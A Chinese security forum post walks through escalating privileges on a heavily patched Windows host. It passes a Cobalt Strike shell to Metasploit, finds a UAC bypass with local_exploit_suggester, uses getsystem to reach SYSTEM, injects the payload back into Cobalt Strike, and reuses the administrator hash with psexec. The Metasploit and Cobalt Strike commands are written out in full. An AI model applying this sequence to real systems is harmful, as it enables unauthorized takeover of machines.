安全矩阵

 找回密码
 立即注册
搜索
查看: 2446|回复: 0

有几百个补丁的机器提不下来?利用 Metasploit 试试

[复制链接]

855

主题

862

帖子

2940

积分

金牌会员

Rank: 6Rank: 6

积分
2940
发表于 2021-8-23 10:40:47 | 显示全部楼层 |阅读模式
原文链接:有几百个补丁的机器提不下来?利用 Metasploit 试试

最近遇到一台机器,打了几百个补丁用各种漏洞提权都无果,最后使用 Metasploit 自带的模块把他的特权提升了,这才提权成功,看文章吧!
利用 Metasploit 进行提权
提权过程
首先是发现目标有 200 多个补丁:

随后我根据补丁号去查询相应的 EXP 去尝试提权发现都失败了,这个时候我把 CobaltStrike 的 Shell 互传到了 Metasploit:
  1. MSF:
  2. use exploit/multi/handler
  3. set payload windows/meterpreter/reverse_http

  4. CS:
  5. 创建监听器windows/foreign/reverse_http
  6. 执行监听器 spawn msf
复制代码




然后通过 Metasploit 的提权检测找到了几个 exp :

run post/multi/recon/local_exploit_suggester

然后利用模块尝试提权:

exploit/windows/local/bypassuac_sdclt

这个时候弹回来了一个 Meterpreter,发现用户没变,但是当前特权多了很多:

然后直接 getsystem 提权到 SYSTEM:

最后利用 Metasploit 把 SYSYEM 的 shell 传到 CobaltStrike:
  1. MSF:
  2. background
  3. use exploit/windows/local/payload_inject
  4. set payload windows/meterpreter/reverse_http
  5. set session 3
  6. run

  7. CS:
  8. windows/beacon_http/reverse_http
复制代码



这个时候目标 user 还是没改变,但是实际上特权已经有了!可以直接 getsystem:

最后抓到 administrator 的密码后,利用本地管理员的账号 hash ,直接本地 psexec 利用本地 administrator 的密码上线:


这个时候发现就是一个 SYSTEM 的 Beacon 会话了!实战情况下 CobaltStrike 提权不成功,就尝试利用 Metasploit 来尝试提权,兴许会有办法!


回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-11-29 14:53 , Processed in 0.014378 second(s), 18 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表